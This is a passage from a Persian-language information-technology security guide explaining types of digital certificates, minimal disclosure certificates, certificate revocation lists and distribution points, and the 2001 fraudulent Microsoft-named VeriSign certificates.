‫ﻫﻮﻳﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ﻭ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺣﻤﻼﺕ ﻓﺮﺩ‪-‬ﺩﺭ‪-‬ﻣﻴﺎﻥ‪-‬ﺭﺍﻩ‪ ١٣٨‬ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺩﺭ ﻋﻤـﻞ ﻣﺠﻮﺯﻫـﺎﻱ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﺑـﻴﺶ ﺍﺯ‬
‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ‪.‬‬

‫ﮔﻮﺍﻫﻲﻫﺎﻱ ﺷﺨﺼﻲ‬
‫ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎ ﺷﺎﻣﻞ ﻧﺎﻡ ﻳﻚ ﺷﺨﺺ ﻭ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻫﺴﺘﻨﺪ‪ .‬ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﻃﻼﻋﺎﺕ ﺩﻳﮕﺮﻱ ﻣﺎﻧﻨﺪ ﺁﺩﺭﺱ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪ ،‬ﺁﺩﺭﺱ‬
‫ﭘﺴﺘﻲ‪ ،‬ﻭ ﺗﺎﺭﻳﺦ ﺗﻮﻟﺪ ﺷﺨﺺ ﺭﺍ ﻧﻴﺰ ﺷﺎﻣﻞ ﺷﻮﻧﺪ‪ .‬ﺁﻧﻬﺎ ﺑﻮﺳﻴﻠﺔ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺮﺍﻱ ﺷﺎﻏﻠﻴﻦ ﻳﺎ ﻣﺸﺘﺮﻳﺎﻧﺸﺎﻥ ﺻﺎﺩﺭ ﻣﻲﺷﻮﻧﺪ‪ .‬ﻣﺠﻮﺯﻫﺎﻱ ﺷﺨﺼﻲ‬
‫ﺫﺍﺗﹰﺎ ﻳﻚ ﺭﻭﺵ ﺍﻳﻤﻦﺗﺮ ﺑﺮﺍﻱ ﺁﻥ ﺍﺳﺖ ﻛﻪ ﺍﻓﺮﺍﺩ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺧﻮﺩﺷﺎﻥ ﺭﺍ ﺑﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﻭ ﺷﻨﺎﺳﻪ ﻛﺎﺭﺑﺮﻱ ﻣﻌﺮﻓـﻲ ﻛﻨﻨـﺪ‪ .‬ﺁﻧﻬـﺎ ﻫﻤﭽﻨـﻴﻦ‬
‫ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﭘﺮﻭﺗﻜﻞ ﺭﻣﺰﻧﮕﺎﺭﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ‪ S/MIME‬ﻻﺯﻡ ﻫﺴﺘﻨﺪ‪.‬‬

‫ﮔﻮﺍﻫﻲﻫﺎﻱ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ‬


‫ﺍﻳﻦ ﻣﺠﻮﺯﻫﺎ ﺑﺮﺍﻱ ﺍﺭﺯﻳﺎﺑﻲ ﺍﻣﻀﺎﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﻮﺯﻳﻊﺷﺪﻩ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ‪ ،‬ﻣﺎﻧﻨﺪ ﺍﺟﺰﺍﻱ ‪ ActiveX‬ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﺍﺟﺮﺍﻳﻲ ﻗﺎﺑﻞ ﺩﺭﻳﺎﻓـﺖ ﺍﺯ‬
‫ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ‪ .‬ﻫﺮﻳﻚ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ﺍﺧﻴﺮ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ‪ Windows‬ﺑﻪ ﻫﻤﺮﺍﻩ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺗﻮﺯﻳﻊﻛﻨﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﻨﺘﺸﺮ‬
‫ﺷﺪﻩ ﻛﻪ ﻫﺮ ﻛﺪﺍﻡ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﺻﺤﺖ ﺍﻣﻀﺎﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺭﻭﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ‪ Windows‬ﺑﻜﺎﺭ ﺭﻭﻧﺪ‪.‬‬

‫ﻣﺠﻮﺯﻫﺎﻱ ﺍﻓﺸﺎﻱ ﺣﺪﺍﻗﻞ‬


‫ﻣﺠﻮﺯﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺮﺍﻱ ﺯﻧﺪﮔﻲ ﺧﺼﻮﺻﻲ ﻛﺎﺭﺑﺮﺍﻥ ﺧـﻮﺩ ﻳـﻚ ﺗﻬﺪﻳـﺪ ﺑـﻪ ﻫﻤـﺮﺍﻩ ﺩﺍﺭﻧـﺪ‪ .‬ﺯﻣﺎﻧﻴﻜـﻪ ﺷـﻤﺎ ﻳـﻚ ﮔـﻮﺍﻫﻲ ﺭﺍ ﺑـﻪ ﻳـﻚ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻴﺪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺁﺳﺎﻧﻲ ﻫﻤﺔ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ ﻫﻮﻳﺖ ﺷﻤﺎ ﻛـﻪ ﺭﻭﻱ ﮔـﻮﺍﻫﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ )ﭼـﻪ‬
‫ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺗﻮﺳﻂ ﺁﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻻﺯﻡ ﺑﺎﺷﺪ ﻭ ﭼﻪ ﻻﺯﻡ ﻧﺒﺎﺷﺪ( ﺭﺍ ﺛﺒﺖ ﻛﻨﺪ‪ .‬ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣـﻮﺍﺭﺩ ﺳـﺎﺯﻣﺎﻧﻲ ﻛـﻪ ﺍﻳـﻦ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺩﺭ‬
‫ﻛﺎﺭﻫﺎﻱ ﺗﺠﺎﺭﻱ ﺑﺪﺳﺖ ﻣﻲﺁﻭﺭﺩ ﺁﺯﺍﺩ ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﻫﺮ ﻛﺎﺭﻱ ﻛﻪ ﺧﻮﺍﺳﺖ ﺍﻧﺠﺎﻡ ﺩﻫﺪ‪.‬‬
‫ﻳﻚ ﺭﻭﺵ ﺑﺮﺍﻱ ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻥ ﺗﻬﺪﻳﺪ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺠﻮﺯﻫﺎﻱ ﺍﻓﺸﺎﻱ ﺣﺪﺍﻗﻞ‪ ١٣٩‬ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﻣﺠﻮﺯﻫﺎ ﺑﻪ ﻣﺎﻟﻜﺎﻥ ﺧـﻮﺩ‬
‫ﻼ ﺯﻧـﻲ‬
‫ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﺑﺼﻮﺭﺕ ﺍﻧﺘﺨﺎﺑﻲ ﻗﺴﻤﺘﻬﺎﻱ ﺧﺎﺻﻲ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﻣﺠﻮﺯ ﻣﻨﺘﺸﺮ ﻛﻨﻨﺪ‪ ،‬ﺑﺪﻭﻥ ﺁﻧﻜﻪ ﻗﺴﻤﺘﻬﺎﻱ ﺩﻳﮕﺮ ﻓﺎﺵ ﺷﻮﻧﺪ‪ .‬ﻣﺜ ﹰ‬
‫ﻛﻪ ﻣﻲﺧﻮﺍﻫﺪ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﮔﺮﻭﻩ ﻗﺮﺑﺎﻧﻴﺎﻥ ﺳﺮﻃﺎﻥ ﻭﺍﺭﺩ ﺷﻮﺩ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻣﺠﻮﺯﻫﺎﻱ ﺍﻓﺸﺎﻱ ﺣﺪﺍﻗﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﺗﺎ ﺑﻪ ﺳـﺎﻳﺖ ﻭﺏ ﺛﺎﺑـﺖ‬
‫ﻛﻨﺪ ﻛﻪ ﺍﻭ ﻳﻚ ﺯﻥ ﺑﺎﻻﻱ ‪ ۲۱‬ﺳﺎﻝ ﺍﺳﺖ ﻛﻪ ﺳﺮﻃﺎﻥ ﺳﻴﻨﻪ ﺩﺍﺭﺩ‪ ،‬ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﻧﺎﻡ ﻳﺎ ﺁﺩﺭﺳﺶ ﻓـﺎﺵ ﮔـﺮﺩﺩ‪ .‬ﻣﻔﻬـﻮﻡ ﻣﺠﻮﺯﻫـﺎﻱ ﺍﻓـﺸﺎﻱ‬
‫ﺣﺪﺍﻗﻞ ﺗﻮﺳﻂ ﻳﻚ ﺭﻳﺎﺿﻴﺪﺍﻥ ﺑﻪ ﻧﺎﻡ ﺍﺳﺘﻔﺎﻥ ﺑﺮﻧﺪﺯ‪ ١٤٠‬ﺍﺑـﺪﺍﻉ ﺷـﺪ ﻭ ﺩﺭ ﻣـﺎﻩ ﻓﻮﺭﻳـﻪ ﺳـﺎﻝ ‪ ۲۰۰۰‬ﮔـﻮﺍﻫﻲ ﺍﻧﺤـﺼﺎﺭﻱ ﺷـﺮﻛﺖ ﻛﺎﻧـﺎﺩﺍﻳﻲ‬
‫‪ ١٤١Zero Knowledge Systems‬ﺭﺍ ﻛﺴﺐ ﻛﺮﺩ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺍﺑﻄﺎﻝ‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ‪ ،‬ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺑﻔﻬﻤﺪ ﻛﻪ ﺩﭼﺎﺭ ﺍﺷﺘﺒﺎﻩ ﺷﺪﻩ ﺍﺳﺖ ﻳﺎ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﮔﺮﻓﺘﻪ ﺑﺎﻳﺪ ﺑﺘﻮﺍﻧﺪ ﮔﻮﺍﻫﻲ ﻣﺮﺑﻮﻃﻪ ﺭﺍ ﺑﺎﻃﻞ ﻛﻨﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺯﻣﺎﻧﻴﻜﻪ ﻣﺪﺕ ﺍﻋﺘﺒﺎﺭ ﻫﺮﻳﻚ ﺍﺯ ﻣﺸﺘﺮﻛﻴﻦ ﺑﻪ ﭘﺎﻳـﺎﻥ ﻣـﻲﺭﺳـﺪ ﮔـﻮﺍﻫﻲ ﺍﻭ ﺑﺎﻳـﺪ‬
‫ﺍﺑﻄﺎﻝ ﺷﻮﺩ‪.‬‬
‫ﻼ ﺭﻭﺷﻦ ﺷﺪ‪ ،‬ﺯﻣﺎﻧﻴﻜﻪ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ ﺍﻋـﻼﻡ ﻛـﺮﺩ ﻛـﻪ ‪ VeriSign‬ﺑـﺮﺍﻱ‬ ‫ﻧﻴﺎﺯ ﺑﻪ ﻳﻚ ﻣﻜﺎﻧﻴﺰﻡ ﻋﻤﻠﻲ ﺍﺑﻄﺎﻝ ﺩﺭ ﻣﺎﺭﺱ ﺳﺎﻝ ‪ ۲۰۰۱‬ﻛﺎﻣ ﹰ‬
‫ﻓﺮﺩﻱ ﻛﻪ ﺑﻪ ﺩﺭﻭﻍ ﺍﺩﻋﺎ ﻣﻲﻛﻨﺪ ﻳﻜﻲ ﺍﺯ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺍﺳﺖ ﻭ ﻧﺎﻣﻲ ﻛﻪ ﺑﻌﻨﻮﺍﻥ ﺷﺮﻛﺖ ﻣﺤﻞ ﻛﺎﺭ ﺍﻭ ﺩﺭ ﻫﺮ ﺩﻭ ﻣﺠﻮﺯ ﺛﺒﺖ ﺷﺪﻩ‬
‫ﺷﺮﻛﺖ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺍﺳﺖ‪ ،‬ﺩﺭ ﻣﺎﻩ ﮊﺍﻧﻮﻳﻪ ﺩﻭ ﻣﺠﻮﺯ ﺻﺎﺩﺭ ﻛﺮﺩﻩ ﺍﺳﺖ‪ .‬ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺍﺷﺎﺭﻩ ﻛﺮﺩ ﻛﻪ "ﺗﻮﺍﻧﺎﻳﻲ ﺍﻣﻀﺎﻱ ﻓﺎﻳﻠﻬﺎﻱ ﺍﺟﺮﺍﻳـﻲ ﺑـﺎ‬

‫‪138‬‬ ‫‪Man-in-the-Middle‬‬
‫‪139‬‬ ‫‪Minimal Disclosure Certificates‬‬
‫‪140‬‬ ‫‪Stefan Brands‬‬
‫‪141‬‬ ‫‪http://www.wired.com/news/technology/0,1282,34496,00.html‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٢٤‬‬

‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪﻫﺎﻳﻲ ﻣﺪﻋﻲ ﻫﺴﺘﻨﺪ ﺑﻪ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺗﻌﻠﻖ ﺩﺍﺭﻧﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻤﻴﻨﻲ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍ ﻭﺍﺩﺍﺭ ﺑـﻪ ﭘـﺬﻳﺮﺵ‬
‫‪١٤٢‬‬
‫ﺍﺟﺮﺍﻱ ﺁﻥ ﻓﺎﻳﻠﻬﺎ ﻛﻨﻨﺪ ﻣﻨﺎﻓﻌﻲ ﺯﻳﺎﺩﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ"‪.‬‬

‫ﻓﻬﺮﺳﺖﻫﺎﻱ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺑﺎﻃﻠﻪ‬


‫ﻳﻚ ﺷﻴﻮﻩ ﺑﺮﺍﻱ ﺍﺑﻄﺎﻝ‪ ،‬ﺍﻧﺘﺸﺎﺭ ﻓﻬﺮﺳﺖ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺑﺎﻃﻠﻪ )‪ ١٤٣(CRL‬ﺍﺳﺖ‪ .‬ﻳﻚ ‪ CRL‬ﻓﻬﺮﺳﺘﻲ ﺍﺳﺖ ﺍﺯ ﻫﻤﺔ ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﻛـﻪ ﺗﻮﺳـﻂ‬
‫‪ CA‬ﺑﺎﻃﻞﺷﺪﻩﺍﻧﺪ ﻭ ﺑﻪ ﺩﻻﻳﻞ ﻣﺨﺘﻠﻒ ﻫﻨﻮﺯ ﻣﻨﻘﻀﻲ ﻧﺸﺪﻩﺍﻧﺪ‪ .‬ﺩﺭ ﺣﺎﻟﺖ ﺍﻳﺪﻩﺁﻝ ﻫﺮ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺩﺭ ﻓﻮﺍﺻﻞ ﺯﻣـﺎﻧﻲ ﻣـﻨﻈﻢ ﻳـﻚ‬
‫‪ CRL‬ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﺪ‪ CRL .‬ﺩﺭ ﻛﻨﺎﺭ ﻓﻬﺮﺳﺖ ﻛﺮﺩﻥ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺍﺑﻄﺎﻝ ﺷﺪﻩ‪ ،‬ﻣﺪﺕ ﺯﻣﺎﻥ ﺍﻋﺘﺒﺎﺭ ﺩﺍﺷﺘﻦ ﺧـﻮﺩ ﻭ ﻧﺤـﻮﺓ ﺩﺭﻳﺎﻓـﺖ ‪CRL‬‬
‫ﺑﻌﺪﻱ ﺭﺍ ﻧﻴﺰ ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﮔﻮﺍﻫﻲﻫﺎﻱ ‪ X.509 v3‬ﺑﺎﻳﺪ ﺷﺎﻣﻞ ﻗﺴﻤﺘﻲ ﺑﺎﺷﻨﺪ ﻛﻪ ﻧﻘﻄﺔ ﺗﻮﺯﻳﻊ ‪ ١٤٤(CDP) CRL‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷـﻮﺩ‪ .‬ﺍﺯ ﻟﺤـﺎﻅ ﻧﻈـﺮﻱ‪،‬‬
‫ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺑﺨﻮﺍﻫﺪ ﺍﻋﺘﺒﺎﺭ ﻳﻚ ﮔﻮﺍﻫﻲ ﺭﺍ ﺗﺼﺪﻳﻖ ﻛﻨﺪ ﺑﺎﻳﺪ ﺑﺘﻮﺍﻧﺪ ﻳﻚ ‪ CRL‬ﺭﺍ ﺍﺯ ‪ CDP‬ﻣﺮﺑﻮﻃﻪ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ ﺗﺎ ﺑﺘﻮﺍﻧﺪ ﻣﻌﻴﻦ ﻛﻨﺪ ﻛﻪ‬
‫ﺁﻳﺎ ﮔﻮﺍﻫﻲ ﺍﺑﻄﺎﻝ ﺷﺪﻩ ﺍﺳﺖ ﻳﺎ ﻧﻪ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺑﻴﺸﺘﺮ ﮔﻮﺍﻫﻲﻫﺎ ﺗﻮﺳﻂ ﺗﻌﺪﺍﺩ ﺍﻧﺪﻛﻲ ﺍﺯ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺻﺎﺩﺭ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻣﻨﻄﻘﻲ ﺍﺳـﺖ‬
‫ﺍﮔﺮ ﺗﺼﻮﺭ ﻛﻨﻴﻢ ﻛﻪ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻣﻲﺗﻮﺍﻧﺪ ‪ CRL‬ﺟﺪﻳﺪ ﺭﺍ ﻫﺮ ﺭﻭﺯ ﻳﺎ ﻫﺮ ﺳﺎﻋﺖ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ‪ ،‬ﻭ ﺁﻧﮕﺎﻩ ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﺭﺍ ﺑـﺮﺍﻱ ﺟـﺴﺘﺠﻮﻫﺎﻱ‬
‫ﭘﻴﺎﭘﻲ ﺩﺭ ﺣﺎﻓﻈﻪ ﻧﮕﻪ ﺩﺍﺭﺩ‪ .‬ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻛﻪ ﺍﺭﺗﺒﺎﻁ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﺤﺪﻭﺩ ﺩﺍﺭﺩ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻜﺒﺎﺭ ‪ CRL‬ﺭﺍ ‪ download‬ﻭ ﺁﻧﺮﺍ ﻣﻴـﺎﻥ ﻛـﺎﺭﺑﺮﺍﻧﺶ‬
‫ﺗﻮﺯﻳﻊ ﻛﻨﺪ‪.‬‬
‫ﺩﺭ ﻋﻤﻞ‪CRL ،‬ﻫﺎ ﻭ ‪CDP‬ﻫﺎ ﭼﻨﺪﻳﻦ ﻣﺸﻜﻞ ﺩﺍﺭﻧﺪ‪:‬‬

‫ﺍﮔﺮ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺧﻴﻠﻲ ﻣﺸﻬﻮﺭ ﺑﺎﺷﺪ ﺍﺣﺘﻤﺎﻝ ﺩﺍﺭﺩ ﻛﻪ ‪CRL‬ﻫﺎ ﺧﻴﻠﻲ ﺑﺰﺭﮒ ﺑﺎﺷـﻨﺪ‪ Download .‬ﻛـﺮﺩﻥ ﻳـﻚ ﻓﻬﺮﺳـﺖ‬ ‫•‬
‫ﻼ ‪ ۹۰۰‬ﻛﻴﻠﻮﺑﺎﻳﺖ ﺍﺯ ﻃﺮﻳﻖ ﺍﺗﺼﺎﻝ ﺗﻠﻔﻨﻲ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ SSL‬ﻣﺮﮐـﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ ‪ VeriSign‬ﻣﻤﮑـﻦ‬ ‫‪ CRL‬ﺑﺎ ﺣﺠﻢ ﻣﺜ ﹰ‬
‫ﺍﺳﺖ ﺑﻴﺶ ﺍﺯ ‪ ۲۰‬ﺩﻗﻴﻘﻪ ﻭﻗﺖ ﺑﮕﻴﺮﺩ؛‬
‫ﻣﻴﺎﻥ ﺯﻣﺎﻧﻲ ﻛﻪ ﮔﻮﺍﻫﻲ ﺍﺑﻄﺎﻝ ﻣﻲﺷﻮﺩ ﻭ ﺯﻣﺎﻧﻲ ﻛﻪ ‪ CRL‬ﺟﺪﻳﺪ ﺗﻮﺯﻳﻊ ﻣﻲﺷﻮﺩ ﻳﻚ ﺑـﺎﺯﺓ ﺯﻣـﺎﻧﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺩﺭ ﺁﻥ ﮔـﻮﺍﻫﻲ‬ ‫•‬
‫ﻣﻌﺘﺒﺮ ﺑﻨﻈﺮ ﻣﻲﺁﻳﺪ‪ ،‬ﺩﺭﺣﺎﻟﻴﻜﻪ ﺍﻳﻨﮕﻮﻧﻪ ﻧﻴﺴﺖ؛ ﻭ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎ‪CRL ،‬ﻫﺎ ﻭ ‪CDP‬ﻫﺎ ﺭﺍ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻧﻤﻲﻛﻨﻨﺪ‪.‬‬ ‫•‬

‫ﺩﺭ ﻣﻮﺭﺩ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺟﻌﻠﻲ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﻛﻪ ﭘﻴﺸﺘﺮ ﺍﺷـﺎﺭﻩ ﺷـﺪ‪ ،‬ﮔـﻮﺍﻫﻲﻫـﺎﻱ ﻧﺎﺩﺭﺳـﺖ ﺑﺎﻃـﻞ ﺷـﺪﻧﺪ ﻭ ﺩﺭ ‪ CRL‬ﻣﺮﺑـﻮﻁ ﺑـﻪ‬
‫‪ VeriSign‬ﺁﻣﺪﻧﺪ‪ ،‬ﺍﻣﺎ ﻣﺘﺄﺳﻔﺎﻧﻪ ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﻛﻪ ‪ VeriSign‬ﺻﺎﺩﺭ ﻛﺮﺩﻩ ﺑﻮﺩ ﺣﺎﻭﻱ ‪CDP‬ﻫـﺎﻱ ﻣﻌﺘﺒـﺮ ﻧﺒـﻮﺩ‪) .‬ﻃﺒـﻖ ﺍﻋـﻼﻡ ‪،VeriSign‬‬
‫ﺑﺪﻟﻴﻞ ﻳﻚ ﺍﺷﻜﺎﻝ ﺩﺭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ‪ Authenticode‬ﻛﻪ ﻫﻤﺮﺍﻩ ‪ Internet Explorer 3.02‬ﺗﻮﺯﻳﻊﺷﺪﻩ‪CDP ،‬ﻫﺎ ﺩﺭ ﮔﻮﺍﻫﻲﻫﺎﻱ ‪ Authenticode‬ﻭﺟﻮﺩ ﻧﺪﺍﺭﻧﺪ‪(.‬‬
‫ﺑﺪﻭﻥ ﻭﺟﻮﺩ ‪ ،CDP‬ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺗﻼﺵ ﻣﻲﻛﺮﺩ ﺍﻋﺘﺒﺎﺭ ﮔﻮﺍﻫﻲ ﺟﻌﻠﻲ ﺻﺎﺩﺭ ﺷﺪﻩ ﺭﺍ ﺗﺼﺪﻳﻖ ﻛﻨﺪ‪ ،‬ﻧﻤﻲﺩﺍﻧﺴﺖ ﻛـﻪ ‪ CRL‬ﻣﺮﺑﻮﻃـﻪ ﻛـﻪ‬
‫‪١٤٥‬‬
‫ﮔﻮﺍﻫﻲﻫﺎﻱ ﺑﺎﻃﻠﻪ ﺩﺭ ﺁﻥ ﻓﻬﺮﺳﺖ ﺷﺪﻩ ﺑﻮﺩﻧﺪ ﺭﺍ ﺍﺯ ﻛﺠﺎ ﺑﺎﻳﺪ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﺮﺩ‪.‬‬

‫ﺍﺭﺯﻳﺎﺑﻲ ﺑﻼﺩﺭﻧﮓ ﮔﻮﺍﻫﻲﻫﺎ‬

‫ﻳﻚ ﺭﺍﻩ ﺟﺎﻳﮕﺰﻳﻦ ﺑﺮﺍﻱ ‪CRL‬ﻫﺎ‪ ،‬ﺍﺭﺯﻳﺎﺑﻲ ﺍﻋﺘﺒﺎﺭ ﮔﻮﺍﻫﻲﻫﺎ ﺑﺼﻮﺭﺕ ﺑﻼﺩﺭﻧﮓ ﺍﺳﺖ‪ .‬ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﻻﺯﻡ ﺑﺎﺷﺪ ﻳﻚ ﮔﻮﺍﻫﻲ ﺍﺭﺯﻳﺎﺑﻲ ﺍﻋﺘﺒـﺎﺭ‬
‫ﺷﻮﺩ ﺑﺼﻮﺭﺕ ‪ online‬ﺑﺎ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﺸﻮﺭﺕ ﻣﻲﻛﻨﺪ‪ .‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺭﺯﻳﺎﺑﻲ ﺑﻼﺩﺭﻧﮓ ﻣﺸﻜﻞ ‪ CRL‬ﺭﺍ ﺑﺨﻮﺑﻲ ﺣـﻞ ﻣـﻲﻛﻨﻨـﺪ‪،‬‬
‫ﻫﺮﭼﻨﺪ ﮐﻪ ﺑﻪ ﻳﻚ ﺷﺒﻜﺔ ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﻭ ﻣﻌﺘﺒﺮ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ‪.‬‬

‫‪142 http://www.microsoft.com/technet/security/bulletin/MS01-017.asp‬‬
‫‪143 Certificate Revocation Lists‬‬
‫‪144 CRL Distribution Point‬‬
‫‪ ۱۴۵‬ﺩﺭ ﭘﺎﻳﺎﻥ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﻣﺠﺒﻮﺭ ﺷﺪ ﻳﻚ ﻭﺻﻠﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺻﺎﺩﺭ ﻛﻨﺪ ﺗﺎ ﻣﺸﻜﻞ ﺣﻞ ﺷﻮﺩ‪ .‬ﺍﺻـﻼﺡ ﻣـﻮﺭﺩ ﺍﺷـﺎﺭﻩ ﺣـﺎﻭﻱ ﻳـﻚ ‪ CDP‬ﺍﺿـﺎﻓﻪ ﺑـﻮﺩ ﻛـﻪ ‪Internet‬‬
